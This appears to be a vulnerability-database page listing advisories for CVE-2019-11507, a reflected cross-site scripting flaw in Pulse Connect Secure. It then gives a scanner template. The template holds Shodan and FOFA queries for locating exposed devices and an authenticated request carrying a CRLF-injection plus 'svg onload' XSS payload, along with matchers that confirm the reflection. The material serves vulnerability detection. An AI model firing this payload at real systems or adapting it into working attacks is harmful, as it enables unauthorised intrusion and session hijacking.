| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2019-11507 | 28 Oct 202506:50 | – | circl | |
| Pulse Connect Secure Cross-Site Scripting (CVE-2019-11507) | 15 Sep 201900:00 | – | checkpoint_advisories | |
| CVE-2019-11507 | 8 May 201916:52 | – | cve | |
| CVE-2019-11507 | 8 May 201916:52 | – | cvelist | |
| EUVD-2019-3180 | 7 Oct 202500:30 | – | euvd | |
| SA44516 - 2020-07: Security Bulletin: Multiple Vulnerabilities Resolved in Pulse Connect Secure / Pulse Policy Secure 9.1R8 | 14 Feb 202307:22 | – | ivanti | |
| CVE-2019-11507 | 8 May 201917:29 | – | nvd | |
| CVE-2019-11507 | 8 May 201917:29 | – | osv | |
| Cross site scripting | 8 May 201917:29 | – | prion | |
| PT-2019-12341 · Pulse Secure · Pulse Connect Secure | 8 May 201900:00 | – | ptsecurity |
id: CVE-2019-11507
info:
name: Pulse Secure Pulse Connect Secure - Cross-Site Scripting (Reflected)
author: theamanrawat
severity: medium
description: |
Pulse Secure Pulse Connect Secure (PCS) 8.3.x before 8.3R7.1 and 9.0.x before 9.0R3 contain a reflected cross-site scripting caused by insufficient sanitization on the Application Launcher page, letting attackers execute scripts in the context of the affected page, exploit requires victim to visit a malicious link.
impact: |
Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
remediation: |
Update to version 8.3R7.1 or 9.0R3 or later.
reference:
- https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/
- https://nvd.nist.gov/vuln/detail/CVE-2019-11507
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-11507
epss-score: 0.04055
epss-percentile: 0.89423
cwe-id: CWE-79
cpe: cpe:2.3:a:ivanti:connect_secure:8.3:r1:*:*:*:*:*:*
metadata:
verified: false
vendor: ivanti
product: connect_secure
shodan-query:
- http.html:"welcome.cgi?p=logo"
- http.title:"ivanti connect secure"
fofa-query:
- body="welcome.cgi?p=logo"
- title="ivanti connect secure"
google-query: intitle:"ivanti connect secure"
tags: cve,cve2019,pulsesecure,xss,vkev,vuln
variables:
username: "{{username}}"
password: "{{password}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "xsauth_token")'
condition: and
internal: true
extractors:
- type: regex
group: 1
name: "xsauth_token"
regex:
- 'name="xsauth_token" value="(.*?)"'
internal: true
- raw:
- |
POST /dana-na/auth/url_default/login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
tz_offset=330&clientMAC=&xsauth_token={{xsauth_token}}&username={{username}}&password={{password}}&realm=Users&btnSubmit=Sign+In
- |
GET /dana/home/cts_get_ica.cgi?bm_id=x&vdi=1&appname=aa%0d%0aContent-Type::text/html%0d%0aContent-Disposition::inline%0d%0aaa:bb<svg/onload=alert(document.domain)> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "<svg/onload=alert(document.domain)>")'
condition: and
# digest: 490a0046304402207c66708bd3bf0dfa77c81ae5577d275d2a0baefdd16fbbb6c1f47752a9af6ef602204ad37100565f8f209c0560e413076e1e4e2cac37a6088544233e26e69399b2c7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation